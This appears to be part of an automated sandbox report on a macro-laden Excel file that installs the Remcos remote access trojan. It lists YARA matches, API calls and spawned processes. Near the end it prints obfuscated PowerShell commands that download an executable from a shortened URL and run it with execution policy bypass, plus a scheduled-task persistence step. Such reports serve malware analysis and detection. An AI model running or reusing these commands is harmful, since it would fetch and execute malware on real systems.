                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 34_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_004736A8
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00474258
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00474268
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00477509
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00477518
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00473698
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00477769
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00477778
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00471AF0
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_00471B00
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A5959
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A0048
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A6480
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00471DB0
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D2A6
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F36A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F4258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F4268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F3698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7769
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A5908
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A0006
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A0048
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A6480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_002936A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00294268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00294258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00293698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_0029776A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02255909
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02250006
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02250048
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02256480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040D2A6
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_003936A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00394268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00394258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00393698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397772
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04395909
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04396480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04390007
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04390048
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04395959
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040D2A6
                Source: Shipping Document PLBL003534.xlsOLE indicator, VBA macros: true
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 00413E72 appears 98 times
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 0041203B appears 62 times
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 00414176 appears 50 times
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: String function: 00413E72 appears 49 times
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: String function: 0041203B appears 31 times
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: remcos.exeBinary or memory string: oj; *.csproj; *.user; *.xbap
                Source: remcos.exe, 00000021.00000000.2256915301.00000000001B2000.00000020.00020000.sdmpBinary or memory string: ?*.xml; *.xaml; *.xsl; *.rss; *.cfg; *.config; *.manifest; *.snippet; *.htm; *.html; *.asp; *.aspx; *.asmx; *.ascx; *.master; *.vbproj; *.csproj; *.user; *.xbap
                Source: remcos.exeBinary or memory string: *.xml; *.xaml; *.xsl; *.rss; *.cfg; *.config; *.manifest; *.snippet; *.htm; *.html; *.asp; *.aspx; *.asmx; *.ascx; *.master; *.vbp
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@47/20@27/3
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0DFE0000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-AQK4L7
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\vdewBXiaBrkzxslmwGlfvaQxP
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF630.tmp
                Source: Shipping Document PLBL003534.xlsOLE indicator, Workbook stream: true
                Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............T.......X.......I.................................................................'.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................".........E.R.R.O.R.:. ...p.......l...............A.......................................(.........................".....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................".........E.R.R.O.(.P.....p.......l...............G...............................................j.................".....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.R.:. ...........`.......P.......Y.........................................'.......................,.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.(.P.............`.......P......._...............................................j.................,.....
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\AppData\Local\Temp\sm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: sm.exeString found in binary or memory: /add[@key="
                Source: sm.exeString found in binary or memory: /add[@key="
                Source: remcos.exeString found in binary or memory: /add[@key="
                Source: remcos.exeString found in binary or memory: /add[@key="
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
